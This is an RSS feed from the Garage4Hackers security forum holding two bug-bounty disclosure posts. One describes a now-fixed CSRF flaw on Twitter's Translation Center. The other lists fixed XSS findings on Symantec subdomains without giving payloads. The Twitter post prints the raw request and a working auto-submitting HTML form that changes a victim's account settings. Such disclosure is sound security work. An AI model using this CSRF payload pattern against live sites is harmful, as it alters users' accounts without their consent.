<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Garage4hackers Forum - Blogs - prakhar</title>
		<link>http://garage4hackers.com/blog.php?u=3327</link>
		<description>Garage4Hackers(G4H) is an open security community for Information Security enthusiasts, gurus and aspirants.Members of the team dedicate time and resources towards helping other information security aspirants, sharing knowledge,spreading security awareness and promoting research.</description>
		<language>en</language>
		<lastBuildDate>Sun, 22 Mar 2020 10:26:25 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://garage4hackers.com/images/misc/rss.jpg</url>
			<title>Garage4hackers Forum - Blogs - prakhar</title>
			<link>http://garage4hackers.com/blog.php?u=3327</link>
		</image>
		<item>
			<title>Twitter Translation Center CSRF (Change Badge and Notification Settings)</title>
			<link>http://garage4hackers.com/entry.php?b=513</link>
			<pubDate>Sat, 20 Oct 2012 05:46:08 GMT</pubDate>
			<description>On 28th September 2012, I found a Cross-Site Request Forgery vulnerability on http://translate.twttr.com which is the Twitter Translation Center. 
...</description>
			<content:encoded><![CDATA[<blockquote class="blogcontent restore">On 28th September 2012, I found a Cross-Site Request Forgery vulnerability on <a href="http://translate.twttr.com" target="_blank">http://translate.twttr.com</a> which is the Twitter Translation Center.<br />
<br />
While checking the service I landed up on the &quot;<b>Accounts Settings</b>&quot; page which looked like this.<br />
<br />
<br />
<div style="text-align: center;"><img src="http://garage4hackers.com/attachment.php?attachmentid=537&amp;d=1350709993" border="0" alt="Name:  settings.jpg
Views: 3103
Size:  30.0 KB"  style="float: CONFIG" /></div><br />
So we've two options here, first one toggles the Twitter Badge setting on Twitter.com and second one  toggles the badge related notification.<br />
<br />
POST request which disables both the settings looks like this:<br />
<br />
<br />
<br />
<span style="font-family: Courier New"><b>POST /user/update HTTP/1.1<br />
Host: translate.twttr.com<br />
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
DNT: 1<br />
Proxy-Connection: keep-alive<br />
Referer: <a href="http://translate.twttr.com/user/prakharprasad/settings" target="_blank">http://translate.twttr.com/user/prakharprasad/settings</a><br />
Cookie: &lt;cookies&gt;<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 175<br />
<br />
utf8=%E2%9C%93&amp;_method=put&amp;<br />
authenticity_token=B6PJGp2Hkm1zi6lVN%2FIueNd7QqlAh  IfM5C1pht1MzE8%3D&amp;<br />
user%5Bid%5D=809244&amp;user%5Bbadging_exempted%5D=0&amp;u  ser%5Breceive_badge_email%5D=0</b></span><br />
<br />
<br />
Now in the POST content, parameters of our interest are <b>authenticity_token</b> which is the CSRF prevention token generated by Twitter, <b>user[badging_exempted]</b> and <b>user[receive_badge_email]</b>  toggles the badge related settings, <b>user[id]</b> is the user id of  user, in my case it was 809244 and <b>is static</b>.<br />
<br />
<br />
<br />
So, normally to prevent CSRF on this page <b>authenticity_token</b> needs to be verified on server-side, right ? but this wasn't the situation when I checked it. The server allowed the form to be submitted without even checking the <b>authenticity_token</b> :confused: , which rendered it useless.So we had a <font color="#FF0000">CSRF</font> here.<br />
<br />
The final <b>Proof-of-Concept code</b> I sent to Twitter Security Team to demonstrate CSRF existence looked like this:<br />
<br />
<span style="font-family: Courier New"><b>&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;/head&gt;<br />
&lt;body onload=document.getElementById('xsrf').submit()&gt;<br />
&lt;form id='xsrf' method=&quot;post&quot; action=&quot;http://translate.twttr.com/user/update&quot;&gt;<br />
&lt;input type='hidden' name='user[badging_exempted]' value='0'&gt;&lt;/input&gt;<br />
&lt;input type='hidden' name='user[id]=user[id]' value='809244'&gt;&lt;/input&gt;<br />
&lt;input type='hidden' name='user[receive_badge_email]' value='0'&gt;&lt;/input&gt;<br />
&lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</b></span><br />
<br />
_jim of Twitter Security Team replied within 1 hour of my initial bug report which said the team is investigating the issue.On 16th October the issue was addressed and then onwards the <b>authenticity_token</b> gets checked on the server-side. Any modification to the token results in an error page which looks like this:<br />
<br />
<div style="text-align: center;"><img src="http://garage4hackers.com/attachment.php?attachmentid=538&amp;d=1350710314" border="0" alt="Name:  error.jpg
Views: 486
Size:  42.6 KB"  style="float: CONFIG" /></div><br />
<br />
I'm very thankful to Twitter Team for putting my name along with other white-hats on &quot;<b><a href="https://twitter.com/about/security" target="_blank">Security at Twitter</a></b>&quot; Page.<br />
<br />
Conclusively I would thank _jim who kept me in sync while the issue was investigated and addressed.<br />
<br />
<br />
Cheers to all Garage Members :cool:</blockquote>

]]></content:encoded>
			<dc:creator>prakhar</dc:creator>
			<guid isPermaLink="true">http://garage4hackers.com/entry.php?b=513</guid>
		</item>
		<item>
			<title>Symantec.com subdomains Multiple XSS Vulnerabilities</title>
			<link>http://garage4hackers.com/entry.php?b=437</link>
			<pubDate>Thu, 27 Sep 2012 18:53:06 GMT</pubDate>
			<description>Around half dozen XSS vulnerabilities were found on three subdomains of Symantec Corp. by me 
 
http://clientui-kb.symantec.com...</description>
			<content:encoded><![CDATA[<blockquote class="blogcontent restore">Around half dozen XSS vulnerabilities were found on three subdomains of Symantec Corp. by me<br />
<br />
<a href="http://clientui-kb.symantec.com" target="_blank">http://clientui-kb.symantec.com</a><br />
<a href="http://sfdoccentral.symantec.com" target="_blank">http://sfdoccentral.symantec.com</a><br />
<a href="http://engweb.symantec.com" target="_blank">http://engweb.symantec.com</a><br />
<br />
<br />
<br />
<br />
<br />
<img src="http://garage4hackers.com/attachment.php?attachmentid=515&amp;d=1348770636" border="0" alt="Name:  cl.jpg
Views: 2457
Size:  96.4 KB"  style="float: CONFIG" /><br />
<br />
<br />
<br />
<br />
<img src="http://garage4hackers.com/attachment.php?attachmentid=516&amp;d=1348770688" border="0" alt="Name:  sd.jpg
Views: 2267
Size:  60.3 KB"  style="float: CONFIG" /><br />
<br />
<br />
<br />
<br />
<br />
<img src="http://garage4hackers.com/attachment.php?attachmentid=517&amp;d=1348770733" border="0" alt="Name:  en.jpg
Views: 2248
Size:  69.0 KB"  style="float: CONFIG" /><br />
<br />
<br />
<br />
All the reported vulnerabilities have been fixed by Symantec :cool:<br />
<br />
Cheers to all G4H Members :) w00t</blockquote>

]]></content:encoded>
			<dc:creator>prakhar</dc:creator>
			<guid isPermaLink="true">http://garage4hackers.com/entry.php?b=437</guid>
		</item>
	</channel>
</rss>
